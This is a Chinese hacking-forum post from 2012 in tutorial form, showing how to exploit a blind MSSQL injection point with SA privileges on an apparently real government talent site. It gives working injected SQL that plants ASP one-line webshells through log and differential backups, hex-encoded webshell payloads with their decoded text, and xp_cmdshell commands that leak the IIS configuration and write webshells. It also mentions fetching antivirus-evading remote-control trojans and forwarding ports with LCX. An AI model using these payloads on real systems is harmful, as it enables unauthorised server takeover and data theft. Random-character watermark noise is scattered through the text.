找回密码
 立即注册
查看: 2679|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————" I8 a! q( w/ Y9 p, r
/ b5 l' h$ F- R
- H! E& Z8 f( {" V! m8 c5 o, C
                                                             欢迎高手访问指导,欢迎新手朋友交流学习。9 }3 ~! n4 m1 L, D* a* D
  `5 M# R9 X+ q8 r. \( p6 T8 ]7 I9 U7 |3 r
                                                                 ) l4 X) R+ N' \0 T
                                                                 ' t0 I$ H: a4 y7 p8 c/ ?) o
                                                                  论坛: http://www.90team.net/
% y4 n9 T/ B# G9 s* z3 ~+ j  i# A7 E: u* n, C8 c9 L. T

# T2 f, i% j: T2 a* z6 p1 U/ `/ L+ ~8 R* Y0 d3 C9 Q
友情检测国家人才网" [8 r+ P# ]2 w3 U9 J& ~
2 b, v3 j0 o: O! n  ]! M$ i
9 x4 j1 R2 t4 S# a/ B; @
内容:MSSQL注入SA权限不显错模式下的入侵9 P# o/ L3 g& R7 f

+ o# x# D" `. J1 K1 R
  r5 H& J) g) P$ n9 ~( D8 O一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。
$ t8 {& m, S) a- @- o2 b  a- P' g/ Y
我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。( ^- C0 q( J6 r, V# T
) Z! G- D5 @0 J0 c) O8 `

8 p" `5 v+ f4 V这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。& Y" e, Y3 r8 l% W! S2 Y4 V; [
. A$ c& D( Y9 D' p4 a0 ?! o
思路:
6 g9 I; i2 I9 ]! v  U; a8 N  \
% c( u' W  ~$ P0 i0 ^( o首先:
; q5 X! s5 G1 c& T" Q* E. B( y: C& k: o! U" r+ V
通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。: g3 q) e8 o% M

% _- {# m8 F" W1.日志备份获得Webshell9 c. c! _- m. L3 g2 A" M4 u
" z- O7 j7 ^" \$ b6 O
2.数据库差异备份获得Webshell4 b: C+ j* K8 y% r6 x% y

7 t( @/ q2 ]6 D7 x! P4.直接下载免杀远控木马。
5 c$ s' J  m0 v3 \- N$ g- @/ r
5.直接下载LCX将服务器端口转发出来* Z. v* {9 L5 Z6 ^& _" C# K" ]; F% D( u

, k* g* R% H% W6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。& E1 t+ m# X* e2 [
6 w/ X* u2 h9 T  P
' z8 t7 F5 L3 i+ E& k
" z+ `* e( W6 n  i5 u5 E6 W
在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了,
7 ~( [" d8 q. |0 h; X  [( c" y4 M; k- b* s  r
我直接演示后面一个方法
0 y+ m6 C0 a, Z" U" ]# w
4 w5 t. b# h" g# G) K3 P; _( u# Q! p, }' a$ c
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL 3 U+ z# ?7 |3 D% r! r

5 C+ u3 j& S3 Q- H$ N
  l$ i" z& Q; c8 J7 y$ E0 [5 z" s
+ j0 k/ C! Y9 f' {. O# ?6 E* |
4 D( X2 x: P% k◆日志备份:# q% @- J* f% }3 |( T, Y( i- t

; q) E2 q4 f* L3 i
6 Z9 w/ P6 S, Y0 U5 g1 S) ]1. 进行初始备份, H5 ~+ F! e/ u! P) e2 k$ [' G
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
( q" P' e% p* |: s2 }3 c2 z
( w0 H+ y* _, _6 H2. 插入数据" I( \/ B) G  q% Q! c
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--7 D) ~, \. ~$ a( u3 I5 A% H% R
/ y, q2 L7 d( k2 e, X$ C% c. ]
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>3 z) l1 f& C6 Y8 l& j+ U" g6 n& B, A
  0 X3 z7 _+ k9 p. _
3. 备份并获得文件,删除临时表# r5 z: [- T6 _  [. I0 r; M
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
/ p# e  W( }2 V! Y$ O2 d
1 E: d6 q) W5 J$ R! R/ e: y) G' S4 p! u- b; i

9 M8 E3 ~- k) E# i◆数据库差异备份
% N7 k/ p% G5 l+ L
2 b, j- n8 Y2 d" ?% e! R7 U% V(1. 进行差异备份准备工作
/ d9 `7 k/ E6 W8 b+ D) |7 D
4 ^3 g7 P# p* r7 q;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
- X: H) P! ^9 R$ D5 Y; W4 n: ]
! V+ b1 j% T5 Q0 U' T8 \上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码( h+ \# p/ |! B* C& v# X- j
2 j4 U4 {  U, l: X' D
% I1 ?. a; b0 o
(2. 将数据写入到数据库/ c+ A/ Z: H! R' M  z4 h- n3 n& V
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
! w0 Z. g+ ~, J; N4 E) k. u5 `; |5 w1 M( Q7 ?
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>* W( {9 b" Y& ]( G) P3 i% C( [

+ S5 h0 g1 X; c7 j/ O) M3. 备份数据库并清理临时文件2 c3 |) V, p/ X0 Y: n1 F! j
  ]& n+ T6 |% K
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--* }$ M5 u! ]7 J$ u6 |# D  e

4 O$ Q1 J( `- Z: B! b* T3 V0x633A5C746573742E617370  为 c:\test.asp  删除临时文件
* F: V; ~6 o: y5 `/ `* B. u, k. u3 h6 K3 I# t# x$ V
9 b* \* W7 q9 |" ^/ [* B
, p- y) o1 \% @6 ?
用^转义字符来写ASP(一句话木马)文件的方法:   * J# }. F% t6 H% a' S4 R, X

. M  B% H! f' o3 n0 z- D1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--) F6 O3 C1 l: q" Y, a. N1 M; O

6 [( h& f$ a+ _) {2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
  {1 n- @  L. v
* ?8 U7 m* w& X( @7 g7 |读取IIS配置信息获取web路径
  W5 `, |5 f8 g/ y/ r6 M/ t' T$ V% U, b9 y. K" ?* _4 G
     
: `' T/ t7 c3 b( B% B! h     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--8 ]5 f% K3 {' n. ?( Y

8 u2 n* A2 f& |$ R+ }执行命令7 j* V/ ^# m& k# y2 L
     1 }. d# c/ f) U/ H8 o' x
     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
+ a1 Z7 N( C) @- C- o! T. ]( Y7 @
* l( M0 b* d1 e/ H
3 {! D, b: ?. z9 z; d6 g7 Y% p) T6 ^& J! b

; d& @3 t2 Q3 c" [8 x" d3 m0 S, T4 Q
, J0 f1 F" Z- V$ U" n6 i
0 `) {7 Y( {4 P- t0 `/ w, [

! I9 l' r6 T1 I$ m2 F  G
2 ^9 K- F( {5 C7 b  N) J
% C) V: g8 L  \* Z: K0 R+ @
& B- ^! t: L7 Q, \
( N5 E1 q( u' r1 `4 ?, \
8 s- q  Y4 I* Y5 f" s/ j% H! Q- ^7 j- Q$ x$ z) {% g
# w2 o1 [6 \2 K+ A- S# S# v+ ~

, C8 y  Z9 R2 Y0 c' I
. O" y$ Z8 o7 B' ?+ p6 Y! Z6 Q$ B( [8 U
3 C6 R# \9 }1 f8 z

/ N+ j! B$ k5 F7 V7 {( R# a
8 q/ w, s! I# N; c( D' P0 ~, Z9 r& P0 M6 Q; G
: f" i0 K/ R4 k; z' I  F

5 L3 j6 @* @# Y$ C! H5 e% `2 S4 |/ Z/ y6 B1 ]# I
' B# h% N5 [6 Q3 E& d
; `/ ]. @* z5 z7 v0 v$ m& y( d
8 L! Q3 W/ A0 c; P- J5 U1 X

  [9 Z9 ^/ V5 @* d5 R
! F, v$ l& D# J5 u7 t6 ~  \% P$ c5 Y1 N! r5 e2 g

  u7 V6 s$ }) ]0 p
' X6 n! Z' B1 p* K  g1 p' j
4 e$ i/ C) z- J6 {" m+ \: E0 k8 S* K( O4 L1 v

) F+ }7 J$ ]3 G' E" ]  l, Y) V/ R' n1 _" B; f" R" r
" [1 a, p8 W; O; q6 X: V- g! F
9 N3 e, j$ J! c

9 t) A5 q/ Y4 o$ e) L9 p0 I. X6 c% H, t/ m

( P! y0 x/ o& U" }) a
# F/ H& u) N2 v/ B9 j- l# H$ j
! g! H0 L4 b* H
9 O4 G9 K& B" I- e! V
/ ?$ X2 o( T: z4 n. ], C* R: X' ?6 x( D( O

- m8 ^9 N! f! \# W9 g
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表